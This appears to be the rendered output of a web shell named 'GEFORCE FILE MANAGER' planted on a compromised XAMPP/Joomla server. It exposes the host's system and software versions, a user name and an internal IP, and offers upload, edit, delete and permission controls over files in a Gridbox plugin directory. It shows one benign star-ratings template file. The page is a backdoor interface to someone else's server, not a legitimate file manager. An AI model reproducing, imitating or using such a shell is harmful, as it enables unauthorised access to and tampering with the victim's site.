[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
components
/
com_gridbox
/
views
/
layout
/
patterns
/
plugins
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 ba-box-model-margin.php
519 B
SET
[ EDIT ]
|
[ DEL ]
📄 social-share.php
1,082 B
SET
[ EDIT ]
|
[ DEL ]
📄 star-ratings.php
861 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: star-ratings.php
<?php /** * @package Gridbox * @author Balbooa http://www.balbooa.com/ * @copyright Copyright @ Balbooa * @license http://www.gnu.org/licenses/gpl.html GNU/GPL */ defined('_JEXEC') or die; ob_start(); ?> <div itemscope itemtype="http://schema.org/CreativeWorkSeries"> <meta itemprop="name" content=""> <div class="star-ratings-wrapper"> <div class="stars-wrapper"> <i class="ba-icons ba-icon-star active" data-rating="1"></i> <i class="ba-icons ba-icon-star active" data-rating="2"></i> <i class="ba-icons ba-icon-star active" data-rating="3"></i> <i class="ba-icons ba-icon-star active" data-rating="4"></i> <i class="ba-icons ba-icon-star active" data-rating="5"></i> </div> </div> </div> <?php $out = ob_get_contents(); ob_end_clean();